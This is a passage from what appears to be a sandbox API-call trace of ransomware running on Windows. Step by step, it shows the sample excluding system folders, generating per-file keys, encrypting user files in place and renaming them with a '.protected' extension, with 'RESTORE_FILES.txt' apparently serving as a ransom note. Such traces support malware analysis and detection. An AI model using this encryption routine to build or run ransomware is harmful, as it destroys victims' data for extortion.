pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.397] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".protected") returned 0x0 [0095.397] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="RESTORE_FILES.txt") returned -1 [0095.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.398] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.398] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".txt") returned 0x0 [0095.398] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.398] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rar") returned 0x0 [0095.398] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.398] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".zip") returned 0x0 [0095.398] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.406] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.406] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.407] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.407] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.407] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.407] CloseHandle (hObject=0xa4) returned 1 [0095.408] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.protected") returned 86 [0095.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.protected" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.protected")) returned 1 [0095.409] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.409] lstrcmpiW 
(lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Windows") returned -1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files") returned -1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="System Volume Information") returned -1 [0095.409] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.409] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".protected") returned 0x0 [0095.409] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.409] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.409] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.410] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".txt") returned 0x0 [0095.410] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.410] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rar") returned 0x0 [0095.410] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.410] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".zip") returned 0x0 [0095.410] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.411] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.411] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.412] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.412] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.413] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.413] CloseHandle (hObject=0xa4) returned 1 [0095.413] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.protected") returned 123 [0095.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.protected" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.protected")) returned 1 [0095.414] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Windows") returned -1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files") returned -1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0095.414] lstrcmpiW 
(lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="System Volume Information") returned -1 [0095.414] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.414] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".protected") returned 0x0 [0095.414] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.415] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.415] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".txt") returned 0x0 [0095.415] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.415] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rar") returned 0x0 [0095.415] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.415] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".zip") returned 0x0 [0095.415] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.422] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.422] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.422] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.423] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.423] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.423] CloseHandle (hObject=0xa4) returned 1 [0095.424] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.protected") returned 123 [0095.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.protected" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.protected")) returned 1 [0095.424] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="Windows") returned -1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files") returned -1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files (x86)") returned -1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="$Recycle.bin") returned 1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="System Volume Information") returned -1 [0095.425] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrIW (lpFirst="ntuser.ini", lpSrch=".protected") returned 0x0 [0095.425] lstrcmpW (lpString1="ntuser.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.425] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.425] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" 
(normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrW (lpFirst="ntuser.ini", lpSrch=".txt") returned 0x0 [0095.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrW (lpFirst="ntuser.ini", lpSrch=".rar") returned 0x0 [0095.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrW (lpFirst="ntuser.ini", lpSrch=".zip") returned 0x0 [0095.425] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0095.426] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.426] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0095.426] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.426] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.427] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.427] CloseHandle (hObject=0xa4) returned 1 [0095.427] wnsprintfW (in: pszDest=0x47e9d8, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini.protected") returned 41 [0095.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini.protected" (normalized: "c:\\users\\default\\ntuser.ini.protected")) returned 1 [0095.428] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="Windows") returned -1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="Program Files") returned -1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="Program Files (x86)") returned -1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="$Recycle.bin") returned 1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="System Volume Information") returned -1 [0095.428] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0095.428] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0095.428] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0095.428] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned 31 [0095.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.428] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\.") returned 31 [0095.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.428] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.428] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.428] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.428] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\." (normalized: "c:\\users\\default\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.428] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.429] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.429] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.429] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.429] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.429] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.429] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\..") returned 32 [0095.429] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.429] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.429] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.429] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.429] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.429] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.429] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.429] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.430] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") 
returned 41 [0095.430] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.430] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.430] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.430] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.430] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.430] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.431] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.431] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.431] SetFilePointerEx (in: hFile=0xb4, 